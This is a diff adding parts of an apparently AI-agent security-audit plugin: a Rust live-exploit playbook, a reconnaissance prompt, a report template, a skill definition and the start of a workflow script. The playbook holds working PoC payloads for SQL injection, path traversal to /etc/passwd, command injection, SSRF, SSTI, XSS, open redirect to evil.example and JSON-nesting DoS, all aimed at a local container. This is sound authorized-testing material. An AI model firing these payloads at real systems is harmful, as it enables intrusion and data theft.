+    || /app migrate 2>/dev/null || true'
+  ```
+
+  Many Rust apps with `diesel_migrations`/`sqlx::migrate!` run migrations on
+  boot — then there's nothing to seed beyond the auth step below. A
+  `DATABASE_URL` env is usually required (`-e DATABASE_URL=...`).
+
+- **Auth flow:** if the PoC needs a session/token, register or log in via the
+  app's own endpoint with synthetic creds and keep the cookie jar / capture the
+  token:
+
+  ```sh
+  # Cookie-session apps:
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/login"
+
+  # JWT/bearer apps — capture the token for the Authorization header:
+  TOKEN=$(curl -s -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/auth/login" \
+    | python3 -c 'import sys,json;d=json.load(sys.stdin);print(d.get("token") or d.get("access_token",""))')
+  ```
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class:
+
+```sh
+# SQL injection — raw query built with format!/string concat instead of bound
+# params (sqlx::query(&format!(..)), diesel sql_query, rusqlite execute with formatted SQL):
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/user?id=1%20OR%201=1--" | tee /tmp/poc.$FID.out
+
+# Path traversal / arbitrary file read — std::fs::read / tokio::fs / actix
+# NamedFile / tower-http ServeDir on a user-controlled path; pull a file the
+# app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+# Encoded traversal that bypasses naive Path::join-after-strip:
+curl -s "http://127.0.0.1:$PORT/static/..%2f..%2f..%2fetc%2fpasswd" | head
+
+# Command injection / RCE — std::process::Command with a shell
+# (Command::new("sh").arg("-c").arg(user_input)) or args from user input.
+# Prove exec via a benign in-container sentinel, then read it back
+# (NEVER destructive commands):
+curl -s "http://127.0.0.1:$PORT/ping?host=127.0.0.1;touch%20/tmp/va-pwned"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# SSRF — reqwest/hyper/isahc client fetching a user-supplied URL. Point at a
+# CONTAINER-LOCAL listener you control, never a real host. Run a canary in a
+# sidecar sharing $CN's network namespace, then make the app fetch it:
+docker run -d --name va-canary-$FID --network "container:$CN" \
+  python:3-slim python3 -c 'import http.server,socketserver;socketserver.TCPServer(("127.0.0.1",9999),type("H",(http.server.BaseHTTPRequestHandler,),{"do_GET":lambda s:(s.send_response(200),s.end_headers(),s.wfile.write(b"CANARY"))})).serve_forever()'
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/" | grep -o CANARY
+# Cloud-metadata SSRF guard test stays LOCAL — 169.254.169.254 is only a payload
+# string here, never an actual outbound request.
+
+# SSTI — user-controlled template text in tera / handlebars / askama-at-runtime;
+# submit a template expression and observe it evaluated:
+curl -s "http://127.0.0.1:$PORT/render?tpl=%7B%7B%207%2A7%20%7D%7D" | tee -a /tmp/poc.$FID.out
+
+# Reflected/stored XSS — manual HTML string-building or a template engine with
+# escaping disabled; confirm the payload is reflected unescaped:
+curl -s "http://127.0.0.1:$PORT/profile?name=%3Cscript%3Ealert(1)%3C/script%3E" \
+  | grep -o '<script>alert(1)</script>'
+
+# Open redirect — a 3xx with a user-controlled Location header:
+curl -s -o /dev/null -D- "http://127.0.0.1:$PORT/redirect?next=https://evil.example" \
+  | grep -i '^location:'   # evidence is the header value, no external request made
+
+# Deserialization / DoS — serde_json/bincode/serde_yaml on untrusted input, or
+# an unbounded body. Observe a panic (500 + backtrace) or resource blowup:
+curl -s -H 'Content-Type: application/json' --data-binary @- \
+  "http://127.0.0.1:$PORT/api" <<< '{"deeply":'"$(printf '[%.0s' $(seq 1 100000))"'}' \
+  -o /dev/null -w '%{http_code}\n'
+docker logs --tail 20 $CN | grep -iE 'panic|RUST_BACKTRACE|thread .* panicked'
+
+# tonic/gRPC sink — invoke the method with grpcurl against the local container:
+docker run --rm --network "container:$CN" fullstorydev/grpcurl -plaintext \
+  -d '{"id":"1 OR 1=1"}' 127.0.0.1:50051 pkg.Service/Method
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, reflected script, evaluated template, redirect header, panic backtrace)
+  → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`'s network; no
+outbound connections to real hosts; no real data; side effects are benign
+sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN va-canary-$FID 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID \
+      /tmp/va-$FID.dockerignore /tmp/va-$FID.iid
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`).
+
+1. **Won't serve but builds (library/CLI, or web boot blocked):** drive the
+   vulnerable function directly with a Rust test in the SDK image — the
+   highest-fidelity non-server proof. Set `method: unit-test`.
+
+   ```sh
+   # Run the project's own focused test if one covers the sink (the name is a substring filter):
+   docker run --rm -v "$WT":/src -w /src -e CARGO_TARGET_DIR=/tmp/target \
+     rust:1.79-bookworm cargo test --locked vulnerable_case -- --nocapture
+
+   # Or drop a one-off integration test into tests/ (created if absent) and run
+   # it. An integration test imports the crate by its package name (from Cargo.toml).
+   mkdir -p "$WT/tests" && cat > "$WT/tests/poc_$FID.rs" <<'EOF'
+   // replace `mycrate` with the package name from Cargo.toml (hyphens become underscores)
+   #[test]
+   fn poc() {
+       let out = mycrate::vulnerable("<payload>");   // call the vulnerable API
+       assert!(out.contains("<impact-marker>"), "no impact: {out}");
+       eprintln!("IMPACT: {out}");
+   }
+   EOF
+   docker run --rm -v "$WT":/src -w /src -e CARGO_TARGET_DIR=/tmp/target \
+     rust:1.79-bookworm cargo test --test "poc_$FID" -- --nocapture
+   ```
+
+   For an HTTP handler that won't boot standalone, exercise it in-process with
+   the framework's test client (no real port, no network) — still
+   `method: unit-test`:
+
+   ```rust
+   // axum: use tower::ServiceExt::oneshot against the Router
+   let app = build_router();
+   let res = app.oneshot(
+       Request::builder().uri("/download?file=../../etc/passwd").body(Body::empty()).unwrap()
+   ).await.unwrap();
+   // actix: actix_web::test::{init_service, call_service, TestRequest}
+   // assert the response body contains the leaked content
+   ```
+
+2. **Image builds but the app can't start (missing DB/config/env, `*-sys` native
+   dep, private registry resolved but service deps absent):** record that
+   `cargo build --locked` succeeds, the lock is honored, and the vulnerable code
+   is present and reachable, with the line-referenced source→sink trace as
+   evidence. Set `method: build-only`.
+
+   ```sh
+   docker run --rm -v "$WT":/src -w /src -e CARGO_TARGET_DIR=/tmp/target \
+     rust:1.79-bookworm sh -c 'cargo build --locked --bins && cargo check --tests ; true'
+   ```
+
+3. **Cannot build at all (toolchain/edition mismatch, network/registry blocked,
+   unresolvable private deps):** construct a static PoC — the exact crafted input
+   plus the line-referenced source→sink path showing why it triggers. Set
+   `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/recon.md b/plugins/security/prompts/recon.md
new file mode 100644
index 0000000..021ee0e
--- /dev/null
+++ b/plugins/security/prompts/recon.md
@@ -0,0 +1,222 @@
+<!--
+RECON PROMPT — PHASE 1 of vuln-audit. You are a single fresh-context agent that
+runs BEFORE any finder. Your job is reconnaissance only: detect the stack, map
+the attack surface and trust boundaries, decide which finder classes are worth
+running and which to skip, pick a dynamic-verification strategy, and emit ONE
+structured recon summary the workflow forwards to every later phase. You do NOT
+report vulnerabilities here — you scope the hunt. Read AGENTS.md for the data
+contracts, taxonomy, and the binding signal-discipline policy. Read-only: do not
+mutate the target.
+-->
+
+# Recon — Phase 1 (stack, surface, scope, run strategy)
+
+Work the steps in order. Each step's output feeds the recon summary in step 7.
+Be fast and broad first, then precise. When a step is ambiguous, prefer the
+reading that EXPANDS attack surface (assume input is untrusted until proven
+otherwise) but NARROWS finder selection (skip a class only when you can justify
+it). Cite concrete file paths and line numbers for every claim — recon that
+points later phases at real code is worth ten of generic prose.
+
+## 1. Detect stack, frameworks, and build/run system
+
+Identify the primary language(s), frameworks, and how the target builds and runs.
+Map the result to exactly ONE env playbook key (drives Phase 6 repro):
+
+`crystal · ruby · node · python · go · php · java-jvm · rust · generic-docker · ci-iac`
+
+Detection signals (read-only; do not install anything):
+
+- **Manifests / lockfiles** — the ground truth for language + package manager:
+  - crystal: `shard.yml`, `shard.lock`
+  - ruby: `Gemfile`, `*.gemspec`, `Gemfile.lock`
+  - node: `package.json` (+ `package-lock.json`/`pnpm-lock.yaml`/`yarn.lock`), `tsconfig.json`
+  - python: `pyproject.toml`, `requirements*.txt`, `Pipfile`, `setup.py`, `poetry.lock`
+  - go: `go.mod`, `go.sum`
+  - php: `composer.json`, `composer.lock`
+  - java-jvm: `pom.xml`, `build.gradle(.kts)`, `settings.gradle`, `*.jar`
+  - rust: `Cargo.toml`, `Cargo.lock`
+- **Build/run tells** — `Dockerfile`, `docker-compose*.yml`, `Procfile`, `Makefile`,
+  `Taskfile.yml`, `bin/`, framework CLIs, and the manifest's scripts/tasks.
+- **Framework** — read deps + entry imports: web (Rails/Sinatra/Lucky/Kemal,
+  Express/Nest/Next/Fastify, Django/Flask/FastAPI, Gin/Echo/chi/net-http,
+  Laravel/Symfony/Slim, Spring/Quarkus/Micronaut, actix/axum/rocket), plus
+  ORMs, template engines, queue/worker libs, and serializers — note each, they
+  steer finder selection.
+
+**Playbook key decision:**
+
+- A single dominant app language → that language key.
+- **Polyglot:** pick the key for the language that owns the primary attack
+  surface (the network-facing app), note the others in `notes`. A thin shell of
+  one language around a core of another → key on the core.
+- No buildable app, just a `Dockerfile`/compose stack to run → `generic-docker`.
+- The repo's PRIMARY artifact is CI/CD pipelines or IaC (GitHub Actions/GitLab
+  CI/Forgejo workflows, Terraform/Pulumi/CloudFormation, k8s/Helm, Ansible) with
+  no app to run → `ci-iac`. (Note: an app repo that ALSO has workflows keys on
+  the app language; `ci-iac` is for infra-/pipeline-primary repos.)
+
+Record `stack` (the key) and `frameworks` (list).
+
+## 2. Map the attack surface and trust boundaries
+
+Enumerate every place untrusted input crosses into the system, and the dangerous
+sinks it could reach. For each, capture `file:line`, the kind, and the untrusted
+source. This is the map every finder navigates — be exhaustive on surface,
+precise on location.
+
+- **HTTP routes/handlers** — every route table, controller, middleware, and
+  handler. Capture method, path, auth requirement, and which params/body/headers
+  flow in. Note dynamic/wildcard routes and catch-alls.
+- **CLIs / entrypoints** — `main`/`bin`, argv parsing, subcommands, scripts run
+  with attacker-influenced args or stdin.
+- **Message/queue consumers** — AMQP/Kafka/SQS/Redis/NATS/cron/webhook handlers;
+  the payload is untrusted input.
+- **Deserialization points** — `JSON.parse`/`Marshal`/`pickle`/`yaml.load`/
+  `ObjectInputStream`/`unserialize`/`serde`/MessagePack/protobuf over untrusted
+  bytes; framework auto-binding/mass-assignment.
+- **File/path operations** — reads/writes/joins/globs/zips/uploads/temp files
+  where any path segment is caller-controlled (traversal, symlink, zip-slip).
+- **Outbound network calls** — every server-side HTTP/DB/SMTP/DNS/socket call
+  whose destination or content can be influenced by a caller (SSRF surface).
+- **Auth/authz boundaries** — login, session/token issuance & validation,
+  role/permission checks, tenant isolation, the line between
+  unauthenticated/authenticated/admin. Mark which routes sit on which side.
+- **Secrets/config loading** — env vars, config files, secret managers, key
+  material, connection strings; note defaults and committed values.
+- **Template/HTML rendering** — server-rendered views, string-built HTML, SSTI-
+  capable engines, `dangerouslySetInnerHTML`/`html_safe`/`|safe`/`v-html`.
+- **Trust boundaries** — draw the line for each: where does data go from
+  trusted→untrusted or low-priv→high-priv? An input is only interesting if it
+  reaches a sink ACROSS a boundary.
+
+For each surface entry note any **sanitizer/validator/authz/parameterization**
+already on the path — the FP guard. A sink fronted by an effective control is
+not a lead; record it so later phases don't re-chase it.
+
+## 3. Select relevant finder classes (and justify skips)
+
+For each of the 14 classes, decide RELEVANT or SKIPPED based on the surface from
+step 2. The 14 classes (see `prompts/finders/<key>.md`):
+
+`access-control · ssrf · injection · xss-ssti · auth-session · crypto ·
+deserialization · path-file · secrets · misconfig · supply-chain ·
+logging-errors · dos-redos · csrf-cors`
+
+Relevance heuristics (a class is RELEVANT when its source AND sink both exist):
+
+- **access-control** — any authz boundary or multi-tenant/object-owned resource
+  (IDOR). Almost always relevant if there are authenticated routes.
+- **ssrf** — relevant iff an outbound network call exists with a caller-
+  influenced destination (step 2 outbound list non-empty).
+- **injection** — relevant iff untrusted input reaches a SQL/NoSQL/OS/LDAP/XPath
+  interpreter. Skip if all DB access is ORM-parameterized AND no shell-out.
+- **xss-ssti** — relevant iff server emits HTML/templates with untrusted data,
+  or a template engine renders caller-controlled strings. Skip for pure JSON
+  APIs with no template engine and no HTML rendering.
+- **auth-session** — relevant iff the app issues/validates sessions, tokens,
+  passwords, MFA, or OAuth. Skip if there is no auth at all (note that fact).
+- **crypto** — relevant iff the code does its own crypto: hashing passwords,
+  signing/verifying tokens, encrypting data, RNG for security, TLS config. Skip
+  if no security-relevant crypto primitives are used directly.
+- **deserialization** — relevant iff untrusted bytes hit a deserializer (step 2
+  deserialization list non-empty), esp. native/object formats.
+- **path-file** — relevant iff a caller-influenced path reaches a file op.
+- **secrets** — relevant iff the repo loads/handles credentials or there is any
+  chance of committed secrets (almost always run a quick pass).
+- **misconfig** — relevant iff there is framework/server/cloud config: debug
+  flags, CORS, cookie flags, TLS, exposed admin/actuator, default creds.
+- **supply-chain** — relevant iff there are CI/CD workflows (Dangerous-Workflow,
+  script injection, over-broad tokens, unpinned actions) OR dependency manifests
+  with lockfiles (known-vuln deps). Code-exploitable checks ONLY (per AGENTS.md);
+  posture/SBOM/maintainership is NOT a finding.
+- **logging-errors** — relevant iff untrusted input is logged (log injection /
+  sensitive-data leak) or error handling exposes stack traces / leaks state /
+  fails open (A10).
+- **dos-redos** — relevant iff a user-controlled value reaches a regex, an
+  unbounded loop/allocation, a zip/decompress, or an expensive parse.
+- **csrf-cors** — relevant iff there are state-changing cookie-authenticated
+  routes, CORS config, or framing-sensitive UI. Skip pure token-auth APIs with
+  no cookies (note why).
+
+Output two lists. For every RELEVANT class, add a one-line **priority pointer**:
+the specific surfaces/files from step 2 that finder should hit first. For every
+SKIPPED class, add a one-line **justification** (why no reachable source→sink).
+Default to RELEVANT when uncertain — skipping is a claim you must back.
+
+## 4. Decide the dynamic-verification strategy
+
+Determine how Phase 6 will reproduce findings. Docker-first.
+
+- **Runnable?** Check for `Dockerfile`/`docker-compose*.yml` first (preferred,
+  hermetic), then a native run path (manifest scripts, `Procfile`, `Makefile`
+  targets, framework server command).
+- **Entry command + port** — the exact command that starts the app and the port
+  it binds (read it from config/compose/scripts, don't guess; note env vars and
+  dependent services — DB/cache/queue — needed to boot).
+- **Health check** — how to know it's up (a route, a log line, a port listen).
+- **Not runnable** (library, no server, missing deps, infra-only) → repro falls
+  back to a focused **unit-test** that drives the sink, or a **static PoC** /
+  build-only proof. Say which and why.
+
+Record `run_strategy` as one of:
+`docker-compose | docker | native | unit-test | static-poc`,
+plus the entry command, port, and any boot prerequisites in `notes`.
+
+## 5. Fold in target threat-model guidance
+
+Check for `<target>/.claude/claude-security-guidance.md`. If present, read it and
+fold its threat model into scope: crown-jewel assets, known trust boundaries,
+in/out-of-scope paths, prior findings, and any class-specific guidance. Let it
+RAISE priority and tighten scope; it does NOT lower the signal bar. Summarize the
+relevant points in `notes` and reflect any scope/priority changes in steps 2–4.
+If absent, note that and proceed with defaults.
+
+## 6. Signal discipline (binding — carry it into every later phase)
+
+Recon's selections directly gate noise. Enforce the AGENTS.md contract:
+
+- A class is RELEVANT only when there is a plausible REACHABLE path from
+  untrusted input to a dangerous sink with no effective control already on it.
+  No class earns a slot on defense-in-depth grounds alone.
+- No posture/process items (missing SECURITY.md, SBOM, license, maintainership).
+  These never gate a finder; at most they land in the report's Info appendix.
+- No style/lint nits, no unreachable/dead code, no speculative surfaces.
+- Prefer a tight scope that proves a few real issues over a broad scope that
+  drowns them. When you skip a class, you are asserting there is no reachable
+  source→sink — make that assertion only when the surface map backs it.
+
+## 7. Emit the recon summary
+
+Output exactly ONE structured object (this is the phase deliverable; later
+phases consume it). Shape:
+
+```json
+{
+  "stack": "<one playbook key>",
+  "frameworks": ["<framework/orm/template/queue lib>", "..."],
+  "run_strategy": "docker-compose | docker | native | unit-test | static-poc",
+  "entrypoints": [
+    { "kind": "http|cli|queue|cron|webhook", "ref": "file:line",
+      "detail": "GET /x | subcommand | consumer", "auth": "none|user|admin" }
+  ],
+  "attack_surface": [
+    { "kind": "route|cli|consumer|deser|file|outbound|authz|secret|template",
+      "ref": "file:line", "source": "<untrusted origin>",
+      "sink": "<dangerous op>", "existing_control": "<sanitizer/authz or null>",
+      "classes": ["<finder keys this surface feeds>"] }
+  ],
+  "relevant_classes": [
+    { "class": "<key>", "priority_surfaces": ["file:line", "..."] }
+  ],
+  "skipped_classes": [
+    { "class": "<key>", "reason": "<why no reachable source->sink>" }
+  ],
+  "notes": "run command + port + boot prereqs; polyglot/key rationale; target security-guidance points; blind spots/auth-gated areas; anything Phase 6 needs to boot the app"
+}
+```
+
+Rules for the object: `stack` is exactly one playbook key; `relevant_classes` +
+`skipped_classes` together cover all 14, no overlap; every `attack_surface` entry
+has a real `file:line`; `entrypoints` is the subset of surfaces where untrusted
+input first enters. Keep `notes` operational — it is the bridge to Phase 6.
diff --git a/plugins/security/prompts/report-template.md b/plugins/security/prompts/report-template.md
new file mode 100644
index 0000000..dfc3eb1
--- /dev/null
+++ b/plugins/security/prompts/report-template.md
@@ -0,0 +1,91 @@
+<!--
+AGENT GUIDANCE — read, do not emit this comment block.
+
+You are writing the final audit report for SENIOR ENGINEERS who understand
+security. Optimize for signal and brevity.
+
+Rules:
+- Lead with the worst. Sort findings by severity desc, then status.
+- Body = Critical/High/Medium that are `confirmed` or `likely` ONLY.
+  Low/Info and `triage` candidates go in the appendix. Never bury a Critical
+  under a pile of nits.
+- Per finding: 2–4 sentences of prose, max. Assume the reader knows what SSRF
+  is. Explain THIS instance, not the vuln class.
+- References do the heavy lifting instead of prose: cite terse linked IDs
+  (CWE-89, A05:2025, ASVS V1.2.4). One line of refs, not a paragraph.
+- Evidence is the point. Every confirmed finding shows the PoC command and the
+  observed result. A finding without evidence or a source→sink trace does not
+  belong in the body — move it to triage.
+- Proposed fix = the high-level DIRECTION of the change (what must change and
+  why), 1–2 sentences. NOT a diff, exact code, or step-by-step patch — the actual
+  implementation is the next human/agent's job.
+- If there are zero Critical/High, say so plainly in the summary — that is a
+  good result, not a reason to inflate Mediums.
+- NO status/tally table. The GitHub scan issue and its sub-issues are the live
+  status (open/fixed); duplicating it here just goes stale. Weave the counts into
+  the summary prose ("one critical and one high, both confirmed"). Verification
+  status (confirmed/likely) stays as each finding's badge.
+- Omit empty sections.
+-->
+
+# Security Audit — {{target}} @ {{ref}}
+
+**Scope:** {{paths_in_scope}} · **Out of scope:** {{paths_excluded}}
+**Date:** {{date}} · **Method:** static + dynamic (isolated worktree, live PoC) · **Tool:** vuln-audit {{version}}
+
+## Summary
+
+{{2–4 sentences: overall posture and the single most important thing to fix
+first. Name the dominant risk theme. Weave the counts into the prose (e.g. "one
+critical and one high, both confirmed; one medium") — no status table, the
+GitHub scan issue is the live status.}}
+
+## Findings
+
+<!-- One block per confirmed/likely Critical/High/Medium. Repeat. -->
+
+### [{{id}}] {{title}} · {{Severity}} · {{Confirmed|Likely}}
+
+**Class:** {{vuln_class}} · **Refs:** [{{CWE}}](https://cwe.mitre.org/data/definitions/{{n}}.html) · [{{A0x:2025}}](https://owasp.org/Top10/) · [ASVS {{Vx.y.z}}](https://github.com/OWASP/ASVS)
+**Location:** `{{file}}:{{line}}`{{ · +N other call sites}}
+
+{{2–4 sentences: the specific flaw, the untrusted source, the sink, and why the
+path is reachable (no effective sanitizer/authz). Senior audience — be direct.}}
+
+**PoC**
+```
+{{$ command that reproduced it}}
+{{observed output that proves impact}}
+```
+
+**Impact:** {{one line.}}
+**Proposed fix:** {{1–2 sentences — the high-level direction of the change needed
+and why (e.g. "resolve identity from a server-side session keyed by user id, not
+the client cookie"). NOT a diff or line-level patch — implementation is left to
+whoever picks up the issue.}}
+
+---
+
+## Lower severity (Medium)
+
+<!-- Confirmed/likely Mediums not already given a full block under Findings, as one-liners. Never list a finding twice. -->
+- `{{file:line}}` — {{one-line description}} — {{ref}} — **fix:** {{one-liner}}
+
+## Appendix
+
+### Low / Info
+| Location | Note | Ref |
+|----------|------|-----|
+| `{{file:line}}` | {{one line}} | {{ref}} |
+
+### Triage — not confirmed
+<!-- Candidates that did not survive verification or could not be reproduced.
+     Listed for transparency so reviewers can re-check; not asserted as bugs. -->
+- `{{file:line}}` — {{candidate}} — **why unconfirmed:** {{refuted by verify / could not reproduce / needs prod-like data}}
+
+### Coverage & method
+- **Classes assessed:** {{list}} · **Skipped (not applicable):** {{list}}
+- **ASVS chapters touched:** {{list}}
+- **Dynamic verification:** {{how the target was built/run; what was and wasn't reproducible and why}}
+- **Tools used:** {{semgrep/gitleaks/trivy if present, else "LLM-native"}}
+- **Blind spots:** {{anything not reachable by this audit — auth-gated areas, external services, etc.}}
diff --git a/plugins/security/skills/audit/SKILL.md b/plugins/security/skills/audit/SKILL.md
new file mode 100644
index 0000000..b31f646
--- /dev/null
+++ b/plugins/security/skills/audit/SKILL.md
@@ -0,0 +1,77 @@
+---
+description: >-
+  Run a white-box, dynamically-verified security audit (internal pentest) of a
+  target code repository. Use when the user asks to audit/pentest a repo for
+  vulnerabilities, find security bugs with proof, or runs /security:audit.
+  Produces a terse, senior-engineer report of proven findings with live PoCs and
+  a high-level proposed fix per finding.
+---
+
+# security:audit
+
+Drives the bundled `vuln-audit` workflow: recon → triage → consolidate → deep
+review → adversarial verify → dynamic PoC → report. Design spec and data
+contracts are in `${CLAUDE_PLUGIN_ROOT}/AGENTS.md`; output handling / issue
+tracking in `${CLAUDE_PLUGIN_ROOT}/docs/issue-tracking.md`. Read the spec before
+changing anything.
+
+## Input
+
+```
+/security:audit <target-path> [--no-dynamic] [--classes a,b,c] [--ref <git-ref>] [--out <dir>]
+```
+
+`$ARGUMENTS` holds the target path and any flags.
+
+- `<target-path>` — absolute path to the repo to audit (required).
+- `--no-dynamic` — skip the build/run/PoC phase (static + adversarial verify only).
+- `--classes` — restrict to specific vuln-class keys (see `AGENTS.md` taxonomy).
+- `--ref` — git ref to audit (default `HEAD`).
+- `--out` — writable directory for the output bundle (default: `<cwd>/vuln-audit-reports`).
+
+## Steps
+
+1. **Parse `$ARGUMENTS`** into the target path + flags. The bundled tool root is
+   `${CLAUDE_PLUGIN_ROOT}` (expands to the plugin's install dir; it holds
+   `prompts/`, `workflows/`, and the docs — read-only).
+2. **Pick a writable `outDir`** — the plugin root is read-only/ephemeral, so the
+   bundle must go elsewhere. Use `--out` if given, else `<cwd>/vuln-audit-reports`
+   (absolute path). This is also where a courier later fetches the bundle from.
+3. **Validate the target** — confirm it exists and is a git repo
+   (`git -C <target> rev-parse --git-dir`). Worktree isolation and the live-PoC
+   phase need git. If it isn't a repo, warn and proceed with `--no-dynamic`.
+4. **Preflight host capabilities** → assemble a `hostNotes` string: is `docker`
+   usable non-interactively (note if it needs `sudo`); which native runtimes are
+   present (`python3`, `node`, `ruby`, `go`, `crystal`, ...). If dynamic is on
+   but neither docker nor a usable native runtime exists, fall back to
+   `--no-dynamic` and say repro will be static/unit-test only.
+5. **Check target threat-model** — note whether
+   `<target>/.claude/claude-security-guidance.md` exists; recon folds it in.
+6. **Invoke the workflow** (it runs in the background and notifies on completion):
+   ```
+   Workflow({ scriptPath: '${CLAUDE_PLUGIN_ROOT}/workflows/vuln-audit.js', args: {
+     toolRoot: '${CLAUDE_PLUGIN_ROOT}',
+     outDir: '<abs writable outDir>',
+     target: '<abs target-path>',
+     ref: '<ref or HEAD>',
+     dynamic: <true unless --no-dynamic>,
+     onlyClasses: <array or omit>,
+     scope: '<what is in/out of scope>',
+     hostNotes: '<from step 4>'
+   }})
+   ```
+7. **Present the result** — when it completes, read `report_path` and give a
+   tight summary: severity counts and the top 1–3 confirmed findings (title +
+   location + one-line impact). Point to the bundle dir; don't paste the whole
+   report. Surface anything that blocked dynamic verification.
+
+## Notes
+
+- High-signal is the contract: the workflow drops noise, posture/process items,
+  and unreachable findings on purpose. Don't reintroduce them in the summary.
+- The report's remediation is a **high-level proposed fix** (direction, not a
+  patch) — implementation is left to whoever takes the finding.
+- This is the deepest layer of defense-in-depth, complementing the in-session
+  security-guidance plugin, `/security-review`, and PR Code Review.
+- Authorized testing only: target repos you own or are explicitly cleared to
+  audit. All PoC traffic stays local; never fire exploits at external hosts.
diff --git a/plugins/security/workflows/vuln-audit.js b/plugins/security/workflows/vuln-audit.js
new file mode 100644
index 0000000..658380a
--- /dev/null
+++ b/plugins/security/workflows/vuln-audit.js
@@ -0,0 +1,229 @@
+export const meta = {
+  name: 'vuln-audit',
+  description: 'White-box, dynamically-verified security audit of a target repo (recon -> triage -> deep review -> adversarial verify -> dynamic PoC -> report)',
+  whenToUse: 'Invoked by the /security:audit skill. Runs a multi-phase, high-signal security audit and writes a senior-engineer report.',
+  phases: [ // titles match the phase names used by the phase() calls and agent `phase:` options in this script
+    { title: 'Recon', detail: 'detect stack, map attack surface, pick run strategy' },
+    { title: 'Triage', detail: 'one finder per relevant vuln class' },
+    { title: 'Consolidate', detail: 'dedup + drop noise + stable IDs' },
+    { title: 'Review', detail: 'deep review: reachable source->sink with no mitigation' },
+    { title: 'Verify', detail: 'adversarial skeptic panel tries to refute' },
+    { title: 'Repro', detail: 'build + run + live PoC in an isolated worktree' },
+    { title: 'Report', detail: 'synthesize the senior-engineer report' },
+  ],
+}
+
+// ---- inputs (assembled by the skill) ----
+// The Workflow runtime may deliver `args` as a JSON string rather than a parsed
+// object; normalize so every input below is read from a real object.
+const A = (typeof args === 'string') ? JSON.parse(args) : (args && typeof args === 'object' ? args : {})
+if (!A.toolRoot || !A.target) {
+  throw new Error(`vuln-audit: missing required args (toolRoot, target). Got keys: ${Object.keys(A).join(', ') || 'none'}`)
+}
+const TOOL = String(A.toolRoot).replace(/\/+$/, '')   // this tool's repo (has prompts/, reports/)
+const TARGET = String(A.target).replace(/\/+$/, '')
+const REF = A.ref || 'HEAD'
+const DYNAMIC = A.dynamic !== false                    // dynamic verification on by default
+const ONLY = (() => {           // accept array, JSON-string-of-array, or comma-separated string
+  let v = A.onlyClasses
+  if (typeof v === 'string') { try { v = JSON.parse(v) } catch (_) { v = v.split(',') } }
+  if (Array.isArray(v)) { const a = v.map(s => String(s).trim()).filter(Boolean); return a.length ? a : null }
+  return null
+})()
+const TARGET_NAME = TARGET.split('/').pop() || 'target'
+const SCOPE = A.scope || TARGET
+const HOST = A.hostNotes || ''        // host capability/constraint notes (e.g. "docker needs sudo; python3 native available")
+const OUT = A.outDir ? String(A.outDir).replace(/\/+$/, '') : TOOL   // writable bundle output dir; defaults to toolRoot (standalone), but a plugin MUST pass a writable outDir — the plugin root is read-only/ephemeral
+
+const ALL_CLASSES = ['access-control', 'ssrf', 'injection', 'xss-ssti', 'auth-session', 'crypto', 'deserialization', 'path-file', 'secrets', 'misconfig', 'supply-chain', 'logging-errors', 'dos-redos', 'csrf-cors']
+
+// Short class codes for the human-facing display id (e.g. training-tool-AC-1f3a); classes missing here render as GEN.
+const CLASS_CODE = { 'access-control': 'AC', ssrf: 'SSRF', injection: 'INJ', 'xss-ssti': 'XSS', 'auth-session': 'AUTH', crypto: 'CRYPTO', deserialization: 'DESER', 'path-file': 'PATH', secrets: 'SEC', misconfig: 'MISC', 'supply-chain': 'SUPPLY', 'logging-errors': 'LOG', 'dos-redos': 'DOS', 'csrf-cors': 'CSRF' }
+// Deterministic fingerprint over class|file|sink (file and sink lower-cased): djb2 XOR variant, kept unsigned
+// 32-bit, rendered as 8 hex digits. Stable dedup key across scans, identical on the VM and the courier (no shared allocator needed).
+function fpHash(s) { let h = 5381; for (let i = 0; i < s.length; i++) h = ((h * 33) ^ s.charCodeAt(i)) >>> 0; return h.toString(16).padStart(8, '0') }
+function fingerprint(f) { return fpHash(`${f.vuln_class}|${(f.file || '').toLowerCase()}|${(f.sink || '').toLowerCase()}`) }
+
+const SIGNAL = 'SIGNAL DISCIPLINE: audience is senior engineers; stay high-signal. Only treat as real an issue with a REACHABLE path from untrusted input to a dangerous sink, with no effective sanitizer/validator/authz on the path. No style nits, no generic defense-in-depth without a concrete sink, no unreachable/dead code, no posture/process items. Prefer a few proven findings over many speculative ones.'
+
+const LENSES = {
+  exploitability: 'Can a real attacker trigger this with realistic access, and is the impact as claimed? If it needs implausible preconditions, refute.',
+  reachability: 'Is the sink actually reachable from untrusted input at runtime given routing, auth guards, and feature flags? If the path is gated or dead, refute.',
+  correctness: 'Is the technical claim accurate — is this API/pattern genuinely dangerous here, or has the code been misread (safe wrapper, parameterized, framework-escaped)? If misread, refute.',
+}
+
+// ---- schemas ----
+const FINDING_PROPS = {
+  id: { type: 'string' },
+  title: { type: 'string' },
+  vuln_class: { type: 'string' },
